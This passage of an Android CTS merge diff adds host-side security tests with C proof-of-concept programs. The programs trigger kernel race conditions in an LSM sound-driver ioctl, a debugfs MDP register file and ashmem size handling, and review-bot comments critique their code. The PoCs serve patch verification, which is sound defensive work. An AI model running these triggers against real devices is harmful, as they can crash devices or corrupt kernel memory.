Merge "Merge "Add NativeClearKeySystemTest." into nougat-cts-dev am: f96407bf8c" into nougat-mr1-cts-dev am: c556b8adeb am: 87565ff346
am: 3b41d6bf0a -s ours
Change-Id: If54a1e4db0b3a55d2a35d9885464b3831eae2fe5
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index cd68c69..7d2025d 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -44,6 +44,66 @@
<option name="push" value="CVE-2016-8434->/data/local/tmp/CVE-2016-8434" />
<option name="push" value="CVE-2016-8435->/data/local/tmp/CVE-2016-8435" />
<option name="push" value="CVE-2016-9120->/data/local/tmp/CVE-2016-9120" />
+ <option name="push" value="Bug-34328139->/data/local/tmp/Bug-34328139" />
+ <option name="push" value="Bug-33452365->/data/local/tmp/Bug-33452365" />
+ <option name="push" value="CVE-2017-0451->/data/local/tmp/CVE-2017-0451" />
+ <option name="push" value="CVE-2017-0580->/data/local/tmp/CVE-2017-0580" />
+ <option name="push" value="CVE-2017-0462->/data/local/tmp/CVE-2017-0462" />
+ <option name="push" value="CVE-2017-0579->/data/local/tmp/CVE-2017-0579" />
+ <option name="push" value="CVE-2017-0577->/data/local/tmp/CVE-2017-0577" />
+ <option name="push" value="CVE-2016-10231->/data/local/tmp/CVE-2016-10231" />
+ <option name="push" value="CVE-2017-0564->/data/local/tmp/CVE-2017-0564" />
+ <option name="push" value="CVE-2017-7369->/data/local/tmp/CVE-2017-7369" />
+ <option name="push" value="CVE-2017-0576->/data/local/tmp/CVE-2017-0576" />
+ <option name="push" value="CVE-2017-0586->/data/local/tmp/CVE-2017-0586" />
+ <option name="push" value="CVE-2017-0705->/data/local/tmp/CVE-2017-0705" />
+ <option name="push" value="CVE-2017-8263->/data/local/tmp/CVE-2017-8263" />
+ <!--__________________-->
+ <!-- Bulletin 2017-01 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <!--__________________-->
+ <!-- Bulletin 2017-02 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <!--__________________-->
+ <!-- Bulletin 2017-03 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <!--__________________-->
+ <!-- Bulletin 2017-04 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <!--__________________-->
+ <!-- Bulletin 2017-05 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <!--__________________-->
+ <!-- Bulletin 2017-06 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <option name="push" value="Bug-35047780->/data/local/tmp/Bug-35047780" />
+ <option name="push" value="Bug-35047217->/data/local/tmp/Bug-35047217" />
+ <option name="push" value="Bug-35048450->/data/local/tmp/Bug-35048450" />
+ <option name="push" value="Bug-35644815->/data/local/tmp/Bug-35644815" />
+
+ <!--__________________-->
+ <!-- Bulletin 2017-07 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <option name="push" value="Bug-33863407->/data/local/tmp/Bug-33863407" />
+ <option name="push" value="Bug-34173755->/data/local/tmp/Bug-34173755" />
+ <option name="push" value="Bug-35950388->/data/local/tmp/Bug-35950388" />
+
+ <!--__________________-->
+ <!-- Bulletin 2017-08 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <option name="push" value="Bug-36266767->/data/local/tmp/Bug-36266767" />
+ <option name="push" value="Bug-36591162->/data/local/tmp/Bug-36591162" />
+ <option name="push" value="CVE-2017-9678->/data/local/tmp/CVE-2017-9678" />
+ <option name="push" value="CVE-2017-9692->/data/local/tmp/CVE-2017-9692" />
+
<option name="append-bitness" value="true" />
</target_preparer>
<test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
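Review bot: The fourteen `push` entries added directly after `CVE-2016-9120` (Bug-34328139 through CVE-2017-8263) sit above the bulletin markers that this same hunk introduces, so they are filed under no bulletin while sections 2017-01 through 2017-05 stay empty. Moving each entry under its bulletin heading would match what the section comments ask for ("add tests solely from this bulletin below"). Where the bulletin for an entry is not known, a short comment above the group, e.g. `<!-- bulletin not yet assigned -->`, would make that explicit.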
diff --git a/hostsidetests/security/securityPatch/Bug-33452365/Android.mk b/hostsidetests/security/securityPatch/Bug-33452365/Android.mk
new file mode 100644
index 0000000..5178058
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-33452365/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-33452365
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
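Review bot: The warning and hardening flags are appended to `CFLAGS` and `LDFLAGS`, which are plain make variables rather than per-module ones, so as far as the Android.mk rules go `-Wall`, `-D_FORTIFY_SOURCE=2` and `-fPIE` are probably not applied to this module, and each `+=` keeps accumulating across every Android.mk that repeats it. The file already uses `LOCAL_LDFLAGS` one line later; the compiler flags should go the same way, e.g. `LOCAL_CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 ...`, and `-rdynamic` should move into `LOCAL_LDFLAGS`. The same lines are copied into the Android.mk files for Bug-33863407, Bug-34173755, Bug-34328139 and Bug-35047217. The last of those builds `poc.cpp`, where C-only warnings such as `-Wstrict-prototypes` would need to be dropped.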
diff --git a/hostsidetests/security/securityPatch/Bug-33452365/poc.c b/hostsidetests/security/securityPatch/Bug-33452365/poc.c
new file mode 100644
index 0000000..e6755a9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-33452365/poc.c
@@ -0,0 +1,225 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <string.h>
+#include <time.h>
+
+#define THREAD_NUM 600
+#define DEV "/dev/snd/pcmC0D16c"
+
+typedef _Bool bool;
+
+enum lsm_app_id {
+ LSM_VOICE_WAKEUP_APP_ID = 1,
+ LSM_VOICE_WAKEUP_APP_ID_V2 = 2,
+};
+
+enum lsm_detection_mode {
+ LSM_MODE_KEYWORD_ONLY_DETECTION = 1,
+ LSM_MODE_USER_KEYWORD_DETECTION
+};
+
+enum lsm_vw_status {
+ LSM_VOICE_WAKEUP_STATUS_RUNNING = 1,
+ LSM_VOICE_WAKEUP_STATUS_DETECTED,
+ LSM_VOICE_WAKEUP_STATUS_END_SPEECH,
+ LSM_VOICE_WAKEUP_STATUS_REJECTED
+};
+
+enum LSM_PARAM_TYPE {
+ LSM_ENDPOINT_DETECT_THRESHOLD = 0,
+ LSM_OPERATION_MODE,
+ LSM_GAIN,
+ LSM_MIN_CONFIDENCE_LEVELS,
+ LSM_REG_SND_MODEL,
+ LSM_DEREG_SND_MODEL,
+ LSM_CUSTOM_PARAMS,
+ LSM_PARAMS_MAX,
+};
+
+struct snd_lsm_ep_det_thres {
+ __u32 epd_begin;
+ __u32 epd_end;
+};
+
+struct snd_lsm_detect_mode {
+ enum lsm_detection_mode mode;
+ bool detect_failure;
+};
+
+struct snd_lsm_gain {
+ __u16 gain;
+};
+
+struct snd_lsm_sound_model_v2 {
+ __u8 __user *data;
+ __u8 *confidence_level;
+ __u32 data_size;
+ enum lsm_detection_mode detection_mode;
+ __u8 num_confidence_levels;
+ bool detect_failure;
+};
+
+struct snd_lsm_session_data {
+ enum lsm_app_id app_id;
+};
+
+struct snd_lsm_event_status {
+ __u16 status;
+ __u16 payload_size;
+ __u8 payload[0];
+};
+
+struct snd_lsm_detection_params {
+ __u8 *conf_level;
+ enum lsm_detection_mode detect_mode;
+ __u8 num_confidence_levels;
+ bool detect_failure;
+};
+
+struct lsm_params_info {
+ __u32 module_id;
+ __u32 param_id;
+ __u32 param_size;
+ __u8 __user *param_data;
+ enum LSM_PARAM_TYPE param_type;
+};
+
+struct snd_lsm_module_params {
+ __u8 __user *params;
+ __u32 num_params;
+ __u32 data_size;
+};
+
+struct snd_lsm_output_format_cfg {
+ __u8 format;
+ __u8 packing;
+ __u8 events;
+ __u8 mode;
+};
+
+#define SNDRV_LSM_DEREG_SND_MODEL _IOW('U', 0x01, int)
+#define SNDRV_LSM_EVENT_STATUS _IOW('U', 0x02, struct snd_lsm_event_status)
+#define SNDRV_LSM_ABORT_EVENT _IOW('U', 0x03, int)
+#define SNDRV_LSM_START _IOW('U', 0x04, int)
+#define SNDRV_LSM_STOP _IOW('U', 0x05, int)
+#define SNDRV_LSM_SET_SESSION_DATA _IOW('U', 0x06, struct snd_lsm_session_data)
+#define SNDRV_LSM_REG_SND_MODEL_V2 _IOW('U', 0x07,\
+ struct snd_lsm_sound_model_v2)
+#define SNDRV_LSM_LAB_CONTROL _IOW('U', 0x08, uint32_t)
+#define SNDRV_LSM_STOP_LAB _IO('U', 0x09)
+#define SNDRV_LSM_SET_PARAMS _IOW('U', 0x0A, \
+ struct snd_lsm_detection_params)
+#define SNDRV_LSM_SET_MODULE_PARAMS _IOW('U', 0x0B, \
+ struct snd_lsm_module_params)
+
+int fd;
+pthread_t thread_id[THREAD_NUM+1] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int attack = 0;
+
+struct snd_lsm_sound_model_v2 snd_model_v2_1 = {0, 0, 0, 0, 0, 0};
+struct snd_lsm_sound_model_v2 snd_model_v2_2 = {0, 0, 0, 0, 0, 0};
+struct snd_lsm_detection_params snd_params = {0, 0, 0, 0};
+unsigned char snd_data[1024] = "abcdefghigklmnjfsljffsljflwjwfhnsdnfsnfsnfsnflnflsfls";
+unsigned char confidence_level_1[4] = "123";
+unsigned char confidence_level_2[20] = "12345678";
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+
+ return ret;
+}
+
+void* child_ioctl_0()
+{
+ set_affinity(1);
+ snd_model_v2_1.data = snd_data;
+ snd_model_v2_1.data_size = sizeof(snd_data);
+ snd_model_v2_1.confidence_level = confidence_level_1;
+ snd_model_v2_1.num_confidence_levels = strlen((const char *)confidence_level_1);
+ snd_model_v2_1.detection_mode = LSM_MODE_USER_KEYWORD_DETECTION;
+ snd_model_v2_1.detect_failure = 1;
+
+ while(1){
+ ioctl(fd, SNDRV_LSM_REG_SND_MODEL_V2, &snd_model_v2_1);
+ }
+}
+
+void* child_ioctl_1()
+{
+ set_affinity(2);
+ snd_model_v2_2.data = snd_data;
+ snd_model_v2_2.data_size = sizeof(snd_data);
+ snd_model_v2_2.confidence_level = confidence_level_2;
+ snd_model_v2_2.num_confidence_levels = strlen((const char *)confidence_level_2);
+ snd_model_v2_2.detection_mode = LSM_MODE_USER_KEYWORD_DETECTION;
+ snd_model_v2_2.detect_failure = 1;
+
+ snd_params.num_confidence_levels = 20;
+ snd_params.conf_level = confidence_level_2;
+ snd_params.detect_failure = 1;
+ snd_params.detect_mode = LSM_MODE_USER_KEYWORD_DETECTION;
+
+ while(1){
+ nanosleep((const struct timespec[]){{0, 100000}}, NULL);
+ ioctl(fd, SNDRV_LSM_SET_PARAMS, &snd_params);
+ }
+}
+
+int main()
+{
+ int i, ret;
+
+ set_affinity(0);
+
+ fd = open(DEV,O_RDWR);
+ if(fd == -1){
+ return -1;
+ }
+
+ ret = ioctl(fd, SNDRV_LSM_START, 0);
+ if(ret)
+ return -1;
+
+ for(i = 0; i < 300; i = i + 2){
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child_ioctl_0, NULL);
+ thread_ret[i+1] = pthread_create(thread_id + i +1, NULL, child_ioctl_1, NULL);
+ }
+
+ i = 0;
+ attack = 1;
+ while(100){
+ nanosleep((const struct timespec[]){{0, 100000}}, NULL);
+ }
+ attack = 0;
+ return 0;
+}
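Review bot: `while(100)` in main is always true, so the `attack = 0; return 0;` after it is unreachable and the binary runs until the host-side harness kills it. The descriptor from `open(DEV,O_RDWR)` is never closed and none of the created threads is joined. A bounded wait such as `for (i = 0; i < WAIT_ITERATIONS; i++) nanosleep(...)` (the constant name is a placeholder) followed by `close(fd)` would let the test end on its own. The values stored in `thread_ret[]` are never read, so a failed `pthread_create` goes unnoticed. `THREAD_NUM` is 600 while the loop bound is a literal `300`, so the loop should use a named constant derived from it.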
diff --git a/hostsidetests/security/securityPatch/Bug-33863407/Android.mk b/hostsidetests/security/securityPatch/Bug-33863407/Android.mk
new file mode 100644
index 0000000..f1c32e1
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-33863407/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-33863407
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-33863407/poc.c b/hostsidetests/security/securityPatch/Bug-33863407/poc.c
new file mode 100644
index 0000000..5b2c95e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-33863407/poc.c
@@ -0,0 +1,93 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sys/mman.h>
+#include <asm/ioctl.h>
+#include <pthread.h>
+
+#define DEBUG
+#ifdef DEBUG
+#define LOG(fmt, ...) do { \
+ printf("%s:%d: "fmt "\n", __FUNCTION__, \
+ __LINE__, ##__VA_ARGS__); \
+} while (0)
+#else
+#define LOG(fmt, ...)
+#endif
+
+char *infopath = "/sys/kernel/debug/mdp/reg";
+int fd1 = -1;
+int fd2 = -1;
+
+#define SIZE 2048
+
+void Thread1(void)
+{
+ int ret;
+ char buf[SIZE] = {0};
+ fd1 = open(infopath, O_RDWR);
+ while (1) {
+ ret = read(fd1, buf, SIZE);
+ sleep(0.1);
+ }
+ close(fd1);
+}
+
+void Thread2(void)
+{
+ int i;
+ while(1) {
+ fd2 = open(infopath, O_RDWR);
+ if(fd2 > 0)
+ {
+ close(fd2);
+ fd2 = -1;
+ }
+ sleep(0.1);
+ }
+}
+
+void trigger()
+{
+ int i, ret;
+ pthread_t tid_a;
+ pthread_t tid_b;
+
+ ret = pthread_create((pthread_t *) &tid_a, NULL, (void *) Thread1, NULL);
+ ret = pthread_create((pthread_t *) &tid_b, NULL, (void *) Thread2, NULL);
+
+ i = 200;
+ do {
+ sleep(1);
+ } while(i-- > 0);
+
+ pthread_join(tid_a, NULL);
+ pthread_join(tid_b, NULL);
+}
+
+int main()
+{
+ trigger();
+ return 0;
+}
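Review bot: `sleep(0.1)` in Thread1 and Thread2 does not pause for a tenth of a second: `sleep()` takes an `unsigned int`, so the argument is truncated to 0 and both loops spin without any delay. Use `usleep(100000)` or `nanosleep()` if the 100 ms pause is intended. Thread1 also never checks the result of `open(infopath, O_RDWR)` before calling `read(fd1, ...)`, and Thread2 tests `fd2 > 0` where `fd2 >= 0` is the valid-descriptor check. Both thread bodies are `while (1)` loops, so the `pthread_join` calls in `trigger()` never return and the 200-second countdown before them does not bound the run time. The thread functions are declared `void f(void)` and cast to `void *`; giving them the `void *(*)(void *)` signature removes the casts.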
diff --git a/hostsidetests/security/securityPatch/Bug-34173755/Android.mk b/hostsidetests/security/securityPatch/Bug-34173755/Android.mk
new file mode 100644
index 0000000..f07cf4e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-34173755/Android.mk
@@ -0,0 +1,35 @@
+#Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+ include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-34173755
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-34173755/local_poc.h b/hostsidetests/security/securityPatch/Bug-34173755/local_poc.h
new file mode 100644
index 0000000..d2508dd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-34173755/local_poc.h
@@ -0,0 +1,81 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#ifndef __CMD_H__
+#define __CMD_H__
+
+#define _IOC_NRBITS 8
+#define _IOC_TYPEBITS 8
+
+/*
+ * Let any architecture override either of the following before
+ * including this file.
+ */
+
+#ifndef _IOC_SIZEBITS
+# define _IOC_SIZEBITS 14
+#endif
+
+#ifndef _IOC_DIRBITS
+# define _IOC_DIRBITS 2
+#endif
+
+#define _IOC_NRMASK ((1 << _IOC_NRBITS)-1)
+#define _IOC_TYPEMASK ((1 << _IOC_TYPEBITS)-1)
+#define _IOC_SIZEMASK ((1 << _IOC_SIZEBITS)-1)
+#define _IOC_DIRMASK ((1 << _IOC_DIRBITS)-1)
+
+#define _IOC_NRSHIFT 0
+#define _IOC_TYPESHIFT (_IOC_NRSHIFT+_IOC_NRBITS)
+#define _IOC_SIZESHIFT (_IOC_TYPESHIFT+_IOC_TYPEBITS)
+#define _IOC_DIRSHIFT (_IOC_SIZESHIFT+_IOC_SIZEBITS)
+
+/*
+ * Direction bits, which any architecture can choose to override
+ * before including this file.
+ */
+
+#ifndef _IOC_NONE
+# define _IOC_NONE 0U
+#endif
+
+#ifndef _IOC_WRITE
+# define _IOC_WRITE 1U
+#endif
+
+#ifndef _IOC_READ
+# define _IOC_READ 2U
+#endif
+
+
+
+#define _IOC_TYPECHECK(t) (sizeof(t))
+#define _IOC(dir,type,nr,size) \
+ (((dir) << _IOC_DIRSHIFT) | \
+ ((type) << _IOC_TYPESHIFT) | \
+ ((nr) << _IOC_NRSHIFT) | \
+ ((size) << _IOC_SIZESHIFT))
+
+
+
+/* used to create numbers */
+#define _IO(type,nr) _IOC(_IOC_NONE,(type),(nr),0)
+#define _IOR(type,nr,size) _IOC(_IOC_READ,(type),(nr),(_IOC_TYPECHECK(size)))
+#define _IOW(type,nr,size) _IOC(_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
+#define _IOWR(type,nr,size) _IOC(_IOC_READ|_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
+
+#endif
+
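Review bot: This header re-defines the ioctl encoding macros (`_IOC`, `_IO`, `_IOR`, `_IOW`, `_IOWR`) that `<linux/ioctl.h>` already provides, and `_IOC_NRBITS`, `_IOC_TYPEBITS` and `_IOC` are defined without an `#ifndef` guard. poc.c in the same directory includes `<linux/ashmem.h>` before this header and uses only `_IO`, so including `<sys/ioctl.h>` there (which also declares `ioctl()`) would likely make this file unnecessary. The include guard `__CMD_H__` is a reserved identifier and is the same name used by Bug-34328139/local_poc.h; a path-based name such as `BUG_34173755_LOCAL_POC_H` avoids both problems.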
diff --git a/hostsidetests/security/securityPatch/Bug-34173755/poc.c b/hostsidetests/security/securityPatch/Bug-34173755/poc.c
new file mode 100644
index 0000000..6ec4efd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-34173755/poc.c
@@ -0,0 +1,155 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <linux/ashmem.h>
+#include <pthread.h>
+#include <sched.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#include "local_poc.h"
+
+#define ASHMEM_CACHE_CLEAN_RANGE _IO(__ASHMEMIOC, 12)
+#define ASHMEM_CACHE_FLUSH_RANGE _IO(__ASHMEMIOC, 11)
+#define ASHMEM_CACHE_INV_RANGE _IO(__ASHMEMIOC, 13)
+
+int fd;
+void *addr;
+pthread_barrier_t barr;
+
+int thread_mmap_status = 0;
+int thread_set_size_status = 0;
+
+void *thread_mmap(void *);
+void *thread_set_size(void *);
+
+#define ORI_SIZE 4096 * 10
+
+#define OVERFLOW_SIZE 0xFFFFFFFFFFFFFFFF - ORI_SIZE
+
+int main(int argc, char **argv) {
+ int ret;
+ int i;
+ pthread_t tid[2];
+ struct stat st;
+ const char *name = "_crash";
+ struct ashmem_pin pin;
+ char *buf;
+ int size;
+ void *map_again;
+ void *map_buf[100];
+ pid_t pid;
+
+ for (i = 0; i < 10; i++) {
+ map_buf[i] =
+ mmap(NULL, 4096 * 100, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS | MAP_ANON | MAP_GROWSDOWN, -1, 0);
+ memset((char *)map_buf[i], 0x0, 4096 * 99);
+ }
+
+ while (1) {
+ pthread_barrier_init(&barr, NULL, 2);
+ thread_mmap_status = 0;
+ thread_set_size_status = 0;
+
+ fd = open("/dev/ashmem", O_RDWR);
+ if (fd < 0) {
+ return 0;
+ }
+
+ ret = ioctl(fd, ASHMEM_SET_SIZE, ORI_SIZE);
+ if (ret < 0) {
+ if (addr != MAP_FAILED) munmap(addr, ORI_SIZE);
+ close(fd);
+ continue;
+ }
+
+ ret = pthread_create(&tid[0], NULL, thread_mmap, NULL);
+ if (ret != 0) {
+ if (addr != MAP_FAILED) munmap(addr, ORI_SIZE);
+ close(fd);
+ return -1;
+ }
+
+ ret = pthread_create(&tid[1], NULL, thread_set_size, NULL);
+ if (ret != 0) {
+ if (addr != MAP_FAILED) munmap(addr, ORI_SIZE);
+ close(fd);
+ return -1;
+ }
+
+ pthread_join(tid[0], NULL);
+ pthread_join(tid[1], NULL);
+
+ errno = 0;
+ size = ioctl(fd, ASHMEM_GET_SIZE, 0);
+ if (size == (unsigned int)OVERFLOW_SIZE && addr != MAP_FAILED) break;
+ }
+
+ map_again = mmap(NULL, ORI_SIZE, PROT_READ | PROT_WRITE,
+ MAP_SHARED | MAP_NORESERVE, fd, 0);
+
+ munmap(addr, ORI_SIZE);
+
+ for (i = 0; i < 10; i++) {
+ munmap(map_buf[i], 4096 * 100);
+ }
+
+ pid = fork();
+ if (pid == 0) {
+ for (i = 0; i < 1000; i++)
+ mmap(NULL, 4096 * 100, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS | MAP_ANON | MAP_GROWSDOWN, -1, 0);
+ memset((char *)map_buf[i], 0x0, 4096 * 99);
+
+ return 0;
+ }
+ sleep(4);
+
+ ret = ioctl(fd, ASHMEM_CACHE_CLEAN_RANGE, 0);
+
+ ret = ioctl(fd, ASHMEM_CACHE_FLUSH_RANGE, 0);
+ ret = ioctl(fd, ASHMEM_CACHE_INV_RANGE, 0);
+ munmap(map_again, ORI_SIZE);
+ close(fd);
+
+ return 0;
+}
+
+void *thread_mmap(void *arg) {
+ pthread_barrier_wait(&barr);
+ addr = mmap(NULL, ORI_SIZE, PROT_READ | PROT_WRITE,
+ MAP_SHARED | MAP_NORESERVE, fd, 0);
+
+ return NULL;
+}
+
+void *thread_set_size(void *arg) {
+ pthread_barrier_wait(&barr);
+ ioctl(fd, ASHMEM_SET_SIZE, OVERFLOW_SIZE);
+
+ return NULL;
+}
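Review bot: In the forked child the `for (i = 0; i < 1000; i++)` loop has no braces, so only the `mmap` call is its body; the indented `memset((char *)map_buf[i], 0x0, 4096 * 99)` runs once after the loop with `i == 1000` and indexes past the 100-element `map_buf`. That is undefined behaviour in the test itself, and a crash of the child there could be mistaken for a result. Either brace the loop and pass the pointer returned by that iteration's `mmap` (after a `MAP_FAILED` check) to `memset`, or delete the stray `memset`. Separately, the `while (1)` retry loop opens `/dev/ashmem` and maps `addr` on every pass but releases neither when the size check fails, and `addr` is compared with `MAP_FAILED` on error paths before any thread has assigned it. The file calls `ioctl()` without including `<sys/ioctl.h>`.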
diff --git a/hostsidetests/security/securityPatch/Bug-34328139/Android.mk b/hostsidetests/security/securityPatch/Bug-34328139/Android.mk
new file mode 100644
index 0000000..cd8d541
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-34328139/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
